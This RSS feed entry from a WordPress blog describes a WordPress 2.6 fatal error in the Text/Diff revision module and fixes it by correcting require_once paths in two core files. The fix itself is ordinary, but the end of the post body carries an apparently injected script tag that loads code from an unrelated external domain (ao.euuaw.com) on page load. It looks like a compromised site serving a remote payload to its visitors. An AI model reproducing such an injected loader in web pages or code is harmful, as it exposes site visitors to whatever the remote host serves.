<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Wacdesigns &#187; Bug</title>
	<atom:link href="http://www.wacdesigns.com/tag/bug/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.wacdesigns.com</link>
	<description>What about Creativity ?</description>
	<lastBuildDate>Sat, 19 Jun 2010 12:58:26 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Fatal error: require_once() [function.require]: Failed opening required &#8216;Text/Diff/Renderer.php&#8217;</title>
		<link>http://www.wacdesigns.com/2008/08/02/fatal-error-require_once-functionrequire-failed-opening-required-textdiffrendererphp/</link>
		<comments>http://www.wacdesigns.com/2008/08/02/fatal-error-require_once-functionrequire-failed-opening-required-textdiffrendererphp/#comments</comments>
		<pubDate>Sat, 02 Aug 2008 18:24:34 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=99</guid>
		<description><![CDATA[Was just trying to view one of my post that i modified once after being published and bumbed up with a page with these error messages: Warning: ini_set() has been disabled for security reasons in /home/wacdesig/public_html/wp-includes/pluggable.php on line 1517 Warning: &#8230; <a href="http://www.wacdesigns.com/2008/08/02/fatal-error-require_once-functionrequire-failed-opening-required-textdiffrendererphp/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Was just trying to view one of my post that i modified once after being published and bumbed up with a page with these error messages:</p>
<p><strong>Warning</strong>:  ini_set() has been disabled for security reasons in <strong>/home/wacdesig/public_html/wp-includes/pluggable.php</strong> on line <strong>1517</strong></p>
<p><strong>Warning</strong>:  require_once(Text/Diff/Renderer.php) [function.require-once]: failed to open stream: No such file or directory in <strong>/home/wacdesig/public_html/wp-includes/Text/Diff/Renderer/inline.php</strong> on line <strong>17</strong></p>
<p><strong>Fatal error</strong>:  require_once() [function.require]: Failed opening required &#8216;Text/Diff/Renderer.php&#8217; (include_path=&#8217;.:/usr/lib/php:/usr/local/lib/php&#8217;) in <strong>/home/wacdesig/public_html/wp-includes/Text/Diff/Renderer/inline.php</strong> on line <strong>17</strong></p>
<p>Apparently this is due to my hosting provider that have disabled the use the the PHP function ini_set(). Great !!! how do i edit post that i have edited before&#8230; fortunately i found out someone that came up with a solution <img src='http://www.wacdesigns.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .</p>
<p>Please note that this issue is only for WP 2.6 and is cause by the new Revision module that allows you to view a revision of your post before it was edited.</p>
<p>Here is the link to the solution for this problem:<a href="http://www.code-styling.de/english/wordpress-26-and-the-textdiff-fatal-errors" target="_blank">http://www.code-styling.de/english/wordpress-26-and-the-textdiff-fatal-errors</a></p>
<p>I also found another solution for those who don&#8217;t want to download the modified WP source file that is proposed in the first solution</p>
<p>Edit the <strong>wp-includes/Text/Diff.php</strong>, line 52 :<br />
[php]<br />
require_once ABSPATH . WPINC . &#8216;/Text/Diff/Engine/&#8217; . $engine . &#8216;.php&#8217;;<br />
[/php]</p>
<p>Edit the <strong>wp-includes/Text/Diff/Renderer/inline.php</strong>, line 17 :<br />
[php]<br />
require_once ABSPATH . WPINC . &#8216;/Text/Diff/Renderer.php&#8217;;<br />
[/php]<br />
[ad#co-inlinepost]<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2008/08/02/fatal-error-require_once-functionrequire-failed-opening-required-textdiffrendererphp/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
